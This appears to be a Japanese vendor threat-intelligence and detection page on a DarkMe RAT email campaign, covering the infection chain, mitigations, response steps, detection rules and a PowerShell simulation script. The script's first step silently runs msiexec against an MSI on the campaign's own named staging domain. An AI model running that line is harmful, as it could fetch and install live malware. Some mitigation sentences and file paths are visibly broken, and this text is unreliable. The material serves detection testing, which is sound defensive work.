DarkMeメールキャンペーンがAPT RAT攻撃でターゲティングを拡大
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
社会工学を利用した新しいキャンペーンが観察されています。これはソフトウェアの脆弱性ではなく、DarkMeスパイRATを配信しています。攻撃者はメールを通じて .pif ファイルを配布し、MSIEXECとVB6ベースの複数のロードを含む多段感染チェーンを開始します。ゼロデイの悪用から高ボリュームの社会工学への移行は、より安価で広範囲で選択性の低い攻撃手法へのシフトを示しています。
調査
Huntressは、Windows Installerを起動してリモートMSIパッケージを取得するという .pif ファイルを検出した後、このキャンペーンを特定しました。分析により、 prnfig.wsfという名前のステージングスクリプト、レジストリインポート、及び rundll32.exe /staを通じたCOMオブジェクトの実行を含む複雑な多段チェーンが明らかになりました。最終段階では、プロセスホローイングを使用して署名されたMicrosoftのバイナリ clspack.exe.
にDarkMeペイロードを注入します。
緩和策 に関連しないDLLパスなしでGUIDと共に フラグを持って起動された フラグを持って起動された を監視する必要があります。セキュリティチームはまた、 msiexec がHTTPS経由でリモートMSIパッケージを取得しているのを検出し、 .pif ファイルの実行を調査する必要があります。 %AppData% のような異常な場所から実行される署名済みMicrosoftバイナリは、追加の精査を受けるべきです。
対応策
不審な活動が検出された場合、影響を受けるエンドポイントを即座に隔離してC2通信を妨害し、データ漏洩を防ぎます。中空化された clspack.exe プロセスを終了し、 %AppData%ComponentsFolder and %AppData%Microsoftから悪意のあるアーティファクトを削除します。カスタムURLプロトコルハンドラと HKCU Run キーを通じて作成された持続化を除去します。影響を受けたユーザーの資格情報をリセットし、ローカルに保存された暗号通貨ウォレットを潜在的に侵害されたものとして扱います。
攻撃フロー
この部分はまだ更新中です。
検出
可能な持続化ポイント[ASEPs – Software/NTUSER Hive](レジストリイベント経由)
実行可能バイナリの異常な拡張子(プロセス作成経由)
LOLBAS WScript / CScript(プロセス作成経由)
リモートMSIファイルインストールの試行の可能性(コマンドライン経由)
異常なトップレベルドメイン(TLD)のDNSリクエストによる不審なコマンド&コントロール(DNS経由)
IOC(HashSha256)で検出:DarkMeメールキャンペーンがAPT RATのターゲットを拡大する
IOC(SourceIP)で検出:DarkMeメールキャンペーンがAPT RATのターゲットを拡大する
IOC(DestinationIP)で検出:DarkMeメールキャンペーンがAPT RATのターゲットを拡大する
DarkMe RATの通信とステージングドメインを検出する [Windows ネットワーク接続]
ダークMe RATキャンペーン活動の検出 [Windows プロセス作成]
シミュレーション実行
-
攻撃ストーリー&コマンド: 敵対者はDarkMe RATを展開し、持続性を維持することを目指しています。署名ベースの検出を回避するため、攻撃者は
msiexecを使用して侵害されたドメイン(onlineview365.com)からリモートペイロードを取得します。初期感染後、攻撃者はに関連しないDLLパスなしでGUIDと共にを使用してGUID経由で特定のCOMオブジェクトを呼び出し、メモリ内でのコード実行を行い、その後cmd.exeを使用してテキストファイルからレジストリ構成をインポートし、環境をwscript.exeベースのペイロード実行のために準備します。 -
リグレッションテストスクリプト:
# DarkMe RATシミュレーションスクリプト # このスクリプトはSigmaルールで定義された正確なコマンドラインをシミュレートします。 Write-Host "[+] DarkMe RATシミュレーションの開始..." -ForegroundColor Cyan # 1. msiexecリモートダウンロードのシミュレーション Write-Host "[*] msiexecリモートダウンロードをシミュレート中..." Start-Process msiexec.exe -ArgumentList "/i https://onlineview365.com/propi.msi /quiet /norestart" -ErrorAction SilentlyContinue # 2. rundll32 COMオブジェクト実行のシミュレーション Write-Host "[*] rundll32 COM実行をシミュレート中..." Start-Process rundll32.exe -ArgumentList "/sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}" -ErrorAction SilentlyContinue # 3. cmd.exeレジストリインポートのシミュレーション Write-Host "[*] cmd.exeレジストリインポートをシミュレート中..." $tempFile = "$env:TEMPfiletext2.txt" "Windows Registry Editor Version 5.00`n[HKEY_CURRENT_USERSoftwareDarkMe]`n"Test"="Value"" | Out-File -FilePath $tempFile -Encoding ascii Start-Process cmd.exe -ArgumentList "/c reg.exe import ""$tempFile""" -Wait # 4. cmd/rundll32親チェーンを介したwscript.exe実行のシミュレーション Write-Host "[*] AppDataからのwscript.exe実行をシミュレート中..." $scriptPath = "$env:APPDATAmalicious_script.vbs" "WScript.Echo `"DarkMe Simulated`"" | Out-File -FilePath $scriptPath -Encoding ascii # 特定の親/子ルールをトリガー: # 親: C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} # 子: wscript.exe %AppData%malicious_script.vbs Start-Process cmd.exe -ArgumentList "/c C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} & wscript.exe ""$scriptPath""" -Wait Write-Host "[+] シミュレーション完了。" -ForegroundColor Green -
クリーンアップコマンド:
# シミュレーションアーティファクトのクリーンアップ Write-Host "[+] クリーンアップ中..." -ForegroundColor Yellow Remove-Item -Path "$env:TEMPfiletext2.txt" -ErrorAction SilentlyContinue Remove-Item -Path "$env:APPDATAmalicious_script.vbs" -ErrorAction SilentlyContinue Write-Host "[+] クリーンアップ完了。" -ForegroundColor Green